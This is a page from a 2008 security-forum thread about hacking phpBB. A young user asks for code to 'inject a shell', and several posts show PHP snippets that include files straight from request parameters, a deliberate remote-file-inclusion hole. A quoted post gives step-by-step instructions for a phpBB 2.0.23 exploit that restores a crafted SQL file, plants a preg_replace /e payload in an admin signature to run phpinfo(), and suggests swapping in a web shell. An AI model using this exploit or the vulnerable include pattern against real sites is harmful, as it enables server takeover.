|
|
|
|
|
|
IT Security and Insecurity Portal |
|
Posted: Mon Mar 24, 2008 8:21 am |
|
|
kr0k0 |
Advanced user |
|
|
Joined: Jan 26, 2008 |
Posts: 128 |
|
|
|
|
|
|
|
koko wrote: | kr0k0 we give advises,we not hacking anybody. |
Yeah i know , thankx koko , but i hack for learing , and i'am not pro , i have just 13 years and thank u for any help , if u want to help me , so help , if not ... |
|
|
|
|
Posted: Mon Mar 24, 2008 10:32 am |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
School boy,Ya.
Go study homework,then find some book for php and Unix.After some years go back and try to hack this forum. |
|
|
|
|
Posted: Mon Mar 24, 2008 10:37 am |
|
|
kr0k0 |
Advanced user |
|
|
Joined: Jan 26, 2008 |
Posts: 128 |
|
|
|
|
|
|
|
Thankx Koko , very Good advise , but Give me just some codes PHP for inject a shell :
examples :
Code: | <?$page=$_GET[page];include($page);?> |
Code: | <?include($_GET[koko])?> |
Give some codes PHP koko please |
|
|
|
|
Posted: Mon Mar 24, 2008 10:45 am |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
I give the code in first page of this thread,but without any basic knowledge in Unix and php you can't do anything dude. |
|
|
|
|
Posted: Mon Mar 24, 2008 11:22 am |
|
|
kieuanh |
Regular user |
|
|
Joined: Mar 22, 2008 |
Posts: 23 |
|
|
|
|
|
|
|
Code: | <?php
if($_GET['file'])
include($_GET['file']);
?> |
|
|
|
|
|
Posted: Mon Mar 24, 2008 11:32 am |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
kieuanh wrote: | Code: | <?php
if($_GET['file'])
include($_GET['file']);
?> |
|
Read the thread first
Code: | URL file-access is disabled in the server configuration |
|
|
|
|
|
Posted: Thu Apr 03, 2008 11:45 am |
|
|
theparadox |
Regular user |
|
|
Joined: Mar 26, 2008 |
Posts: 10 |
|
|
|
|
|
|
|
koko wrote: | Create file test.sql on your PC and put inside this code
Code: | UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo()' WHERE user_id=2; |
Login in admin panel.Restore database.Then select browse your file test.sql and push Start Restore.After that go to your profile and you see phpinfo of the server.
After phpbb: you may put your shell.Good luck.
P.S.Tested on 2.0.23 on my local PC.Working 100%. |
very nice you are using preg_replace "/e" modifier to get code execution
Gj |
|
|
|
|
Posted: Sun Nov 30, 2008 4:05 am |
|
|
-AO- |
Advanced user |
|
|
Joined: Jul 15, 2008 |
Posts: 205 |
Location: United States |
|
|
|
|
|
|
Anyone know if it's the same concept for phpBB 3.x ? |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 2 of 2
Goto page Previous1, 2
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|